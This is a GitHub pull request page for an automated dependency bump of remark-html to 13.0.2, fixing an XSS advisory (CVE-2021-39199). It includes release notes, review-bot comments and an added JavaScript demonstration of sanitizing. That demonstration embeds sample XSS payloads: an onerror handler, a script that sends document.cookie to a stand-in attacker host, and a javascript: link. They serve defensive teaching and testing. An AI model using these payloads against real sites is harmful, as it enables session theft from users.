fix(deps): update dependency remark-html to v13.0.2 [security] #506

Open · wants to merge 1 commit into main from renovate/npm-remark-html-vulnerability

Conversation

renovate[bot] commented Sep 8, 2021

This PR contains the following updates:

Package      Change
remark-html  13.0.1 -> 13.0.2

GitHub Vulnerability Alerts

CVE-2021-39199

Impact

The documentation of remark-html has mentioned that it was safe by default. In practice the default was never safe and had to be opted into. This means arbitrary HTML can be passed through leading to potential XSS attacks.

Patches

The problem has been patched in 13.0.2 and 14.0.1: remark-html is now safe by default, and the implementation matches the documentation.

Workarounds

On older affected versions, pass sanitize: true, like so:

-  .use(remarkHtml)
+  .use(remarkHtml, {sanitize: true})
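Review bot: `.use(remarkHtml, {sanitize: true})` is a stop-gap for the versions before 13.0.2 named in the advisory; after this PR lands, sanitizing is the default, so the explicit option no longer does the protecting, though keeping it documents intent. Since the advisory says the old default was never safe, grep the code base for every other `remarkHtml` pipeline and apply the same option there until each one is on 13.0.2 or 14.0.1.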

References

n/a

For more information

If you have any questions or comments about this advisory:


Release Notes

remarkjs/remark-html (remark-html)

v13.0.2


  • b0b1ba5 Fix to sanitize by default
    The docs have always said remark-html is safe by default. It wasn’t and this patches that.

    If you do want to be unsafe, use remark-html with sanitize: false:

    -  .use(remarkHtml)
    +  .use(remarkHtml, {sanitize: false})
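Review bot: `{sanitize: false}` restores exactly the raw-HTML passthrough the advisory describes as the XSS vector, so any occurrence of it in this repository needs a written justification that the Markdown source is fully trusted (maintainer-authored content only, never user-submitted text); otherwise leave the new default in place.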

Full Changelog: remarkjs/remark-html@13.0.1...13.0.2


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
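To make the advisory concrete, the block below is an added example written for this page; it is not code from remark-html, from the PR, or from this repository, and it does not depend on remark. It models the two behaviours the advisory contrasts with a deliberately tiny Markdown renderer (hypothetical `renderMarkdown`, handling only headings, emphasis, links and raw HTML blocks): raw HTML passed through verbatim, which is what the pre-13.0.2 default did, versus an allowlist sanitizer run over the output, which is what `sanitize: true` (now the default) turns on. The sample Markdown is constructed attacker input. It also goes slightly beyond the advisory by covering a `javascript:` URL in a normal Markdown link, which a sanitizer must reject as well.

```javascript
// Added example (not from remark-html or this PR). A toy Markdown->HTML
// pipeline showing why raw-HTML passthrough by default is an XSS sink, and
// the allowlist sanitizing that the `sanitize` option enables. The sanitizer
// is a teaching stand-in, not a replacement for hast-util-sanitize.

// Constructed attacker input (sample data): user-submitted Markdown with raw
// HTML payloads and a javascript: link.
const ATTACKER_MARKDOWN = `# Hello

Some *emphasis* and a [link](https://example.com).

<img src=x onerror="alert(document.cookie)">
<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>
<a href="javascript:alert(1)">click</a>
`;

const ALLOWED_TAGS = new Set(['p', 'h1', 'h2', 'h3', 'em', 'strong', 'a', 'img', 'ul', 'li', 'code', 'pre', 'br']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt']) };
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

// Escapes text for an HTML text node or attribute value. Existing entities
// are double-encoded (safe but ugly); a real sanitizer decodes first.
function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// A URL is safe if it is relative or uses an allowed scheme. Control characters
// and whitespace are stripped first so "java\tscript:" does not evade the check.
function safeUrl(url) {
  const cleaned = url.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m === null ? true : SAFE_SCHEMES.has(m[1]);
}

// Allowlist sanitizer over an HTML fragment: drops disallowed elements (and the
// whole body of <script>/<style>), disallowed attributes, every on* handler and
// unsafe href/src values; text between tags is re-escaped.
function sanitizeHtml(html) {
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>/g;
  const attrRe = /([a-zA-Z][a-zA-Z0-9-]*)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let out = '';
  let last = 0;
  let skipUntil = null; // name of the element whose body is being discarded
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const text = html.slice(last, m.index);
    const name = m[1].toLowerCase();
    const closing = m[0][1] === '/';
    last = tagRe.lastIndex;
    if (skipUntil !== null) {
      if (closing && name === skipUntil) skipUntil = null;
      continue; // body of a script/style element is dropped entirely
    }
    out += escapeText(text);
    if (!ALLOWED_TAGS.has(name)) {
      if (!closing && (name === 'script' || name === 'style')) skipUntil = name;
      continue; // unknown element: the tag goes, its text content stays
    }
    if (closing) { out += `</${name}>`; continue; }
    let attrs = '';
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const an = a[1].toLowerCase();
      const allowed = ALLOWED_ATTRS[name];
      if (an.startsWith('on') || !allowed || !allowed.has(an)) continue;
      const val = a[2] === undefined ? '' : a[2].replace(/^["']|["']$/g, '');
      if ((an === 'href' || an === 'src') && !safeUrl(val)) continue;
      attrs += ` ${an}="${escapeText(val)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  if (skipUntil === null) out += escapeText(html.slice(last));
  return out;
}

function inline(text) {
  return escapeText(text)
    .replace(/\*([^*]+)\*/g, '<em>$1</em>')
    .replace(/\[([^\]]+)\]\(([^)\s]+)\)/g, '<a href="$2">$1</a>');
}

// Hypothetical renderer. Blocks starting with '<' are raw HTML and are passed
// through verbatim; `sanitize` defaults to true, mirroring the fix in 13.0.2.
function renderMarkdown(markdown, { sanitize = true } = {}) {
  const html = markdown.split(/\n\n+/).map((raw) => {
    const block = raw.trim();
    if (block === '') return '';
    if (block.startsWith('<')) return block;
    const h = /^(#{1,6})\s+(.*)$/.exec(block);
    if (h) return `<h${h[1].length}>${inline(h[2])}</h${h[1].length}>`;
    return `<p>${inline(block)}</p>`;
  }).filter(Boolean).join('\n');
  return sanitize ? sanitizeHtml(html) : html;
}

console.log('--- sanitize: false (old default) ---\n' + renderMarkdown(ATTACKER_MARKDOWN, { sanitize: false }));
console.log('--- sanitize: true (new default) ---\n' + renderMarkdown(ATTACKER_MARKDOWN));
```

The useful habit this shows is the regression check rather than the toy sanitizer itself: keep a test in the project that feeds a payload like `ATTACKER_MARKDOWN` through the real rendering pipeline and asserts that no `<script`, no `on*=` attribute and no `javascript:` URL survives, so a future dependency bump or an accidental `sanitize: false` fails CI instead of shipping.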

vercel bot commented Sep 8, 2021

This pull request is being automatically deployed with Vercel (learn more).
To see the status of your deployment, click below or on the icon next to each commit.

🔍 Inspect: https://vercel.com/neontribe/neontribe-www/8s41xd53MVjxChoRUbAJQBHYpNba
✅ Preview: https://neontribe-www-git-renovate-npm-remark-html-vul-1ce54d-neontribe.vercel.app

@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 75e33e8 to d25121a on October 7, 2021 11:25
@Nikomus Nikomus added the dependencies label Nov 10, 2021
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from d25121a to 0992f3c on December 13, 2021 15:27
@renovate renovate bot changed the title Update dependency remark-html to v13.0.2 [SECURITY] fix(deps): update dependency remark-html to v13.0.2 [security] Mar 26, 2022
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 0992f3c to 21607eb on March 26, 2022 13:34
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 21607eb to 373bc70 on April 11, 2022 17:33
@renovate renovate bot changed the title fix(deps): update dependency remark-html to v13.0.2 [security] Update dependency remark-html to v13.0.2 [SECURITY] Apr 21, 2022
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 373bc70 to 1db7b95 on April 26, 2022 11:12
vercel bot commented Apr 26, 2022

The latest updates on your projects.

Name          Status    Updated (UTC)
neontribe-www ✅ Ready   Sep 9, 2024 1:27pm

@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 5490b09 to 6e3d449 on May 3, 2024 10:51
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 6e3d449 to 1c49410 on May 24, 2024 09:24
@renovate renovate bot changed the title fix(deps): update dependency remark-html to v13.0.2 [security] Update dependency remark-html to v13.0.2 [SECURITY] May 24, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 1c49410 to 9517c3d on May 31, 2024 09:25
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 9517c3d to dd304e6 on June 5, 2024 13:27
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from dd304e6 to 7e2eac6 on June 5, 2024 14:43
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 7e2eac6 to cc78c09 on June 10, 2024 08:52
@renovate renovate bot changed the title Update dependency remark-html to v13.0.2 [SECURITY] fix(deps): update dependency remark-html to v13.0.2 [security] Jun 10, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from cc78c09 to 95e9d01 on June 10, 2024 09:49
@renovate renovate bot changed the title fix(deps): update dependency remark-html to v13.0.2 [security] Update dependency remark-html to v13.0.2 [SECURITY] Jun 10, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 95e9d01 to ce76074 on July 5, 2024 14:35
@renovate renovate bot changed the title Update dependency remark-html to v13.0.2 [SECURITY] fix(deps): update dependency remark-html to v13.0.2 [security] Jul 5, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from ce76074 to afabab2 on July 24, 2024 09:23
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from afabab2 to 42694a4 on August 14, 2024 09:40
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 42694a4 to 8f676ad on September 3, 2024 16:02
Labels: dependencies